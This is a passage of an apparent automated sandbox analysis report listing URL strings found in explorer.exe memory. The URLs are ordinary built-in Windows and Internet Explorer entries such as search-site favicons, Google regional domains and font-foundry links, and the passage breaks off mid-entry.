            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 0000001E.00000002.704498511.00000000045BE000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000